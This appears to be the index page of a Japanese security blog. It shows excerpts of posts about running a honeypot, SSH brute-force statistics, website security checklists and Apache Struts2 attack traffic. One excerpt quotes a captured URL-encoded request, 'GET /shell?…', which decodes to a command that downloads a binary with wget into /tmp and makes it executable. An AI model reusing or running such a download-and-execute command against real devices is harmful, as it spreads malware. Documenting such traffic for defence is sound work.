このブログを始めたころから、どうにかして「自分用のハニーポットをたてて生の攻撃見てみたい！」と思っていたのですが、Linuxの知識も大してなかったため「攻撃されるサーバなんぞ立てられるのか？？？」と、なかばあきらめておりました。 そうしたところ…

セキュリティ対策を考える際によく出てくる「多層防御」という言葉。 「入口対策~内部対策~出口対策」とか「偵察~武器化~~~目的実行」とか、いろんな流れがあるなかで「各段階で有効な対策を組み合わせましょう」という言葉と思っております。 が、いまいち…

だいぶ間が開いてしまった情報ですが、７月はsshへの不正ログインの試行が非常に多かったです。 計428件。平均14件/日くらいだったみたい。 なかでもこの月は日本人の苗字を使ったアカウントによるアクセスがけっこうありました。そのほとんどが国内のIPアド…

「Webアンケートサイトを立ち上げる時に気にしたほうがよいポイントって何だろう」というポイントまとめてみました。 企業ではいろいろな部門が情報発信や情報収集のためWebサイトを立ち上げると思います。 手っ取り早くユーザの声を集めたいときなどは、ア…

どこの企業も一般の方々向けのWebサイトを立ち上げるのは当たり前の時代です。 Webサイト立ち上げのツールや、安い料金でサイトを立ち上げてくれるサイト構築ベンダなど、いまや簡単にサイトの構築ができます。 でもセキュリティ担当やっていると一抹の不安…

前回から少し間が開いてしまいましたが、その間sshに対する大量のログイン試行がありました。 41時間かけて10分間隔でダラダラとログインを試していたようです。 以下がログイン試行に使われたアカウント達です。 admin的なものもあればOS名もあればCMS名も…

初めてこのログを見たときは少しびっくりしました。 40秒ほどのあいだに以下のログが記録されてて「ヤバい！なんかされてる！」と焦ってしまいましたが、ネットで調べてみるとたくさん報告されてますね。 ーーーーーーーーーーーーーーーーーーーーーーーー…

Struts2攻撃と思われるものに交じって、こんなのが来てました。 「GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%XX%XX%2E%XX%XX%XX%2E%XX%XX%XX%2E%XX%XX%3A%35%34%33%32%31%2F%64%6C%72%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%…

本日朝も以下のような探索ログが残っていました。 始めから終わりまで10秒間かけて順番に該当するものがあるか試してるみたいです。 Strutsってデフォルトこういうディレクトリ構成なの？？？（私は知見がないためわからないです） ちなみに発信元はドイツで…

3/23以降、今話題のApache Struts2の脆弱性（S2-045）を狙っているのかもしれないアクセスが急に来ていました。 Struts2を利用していると「.aciton」がURLに付くというのをWeb上で見ましたので、上記は今回の脆弱性を狙う攻撃につながるアクセスなのかなぁと…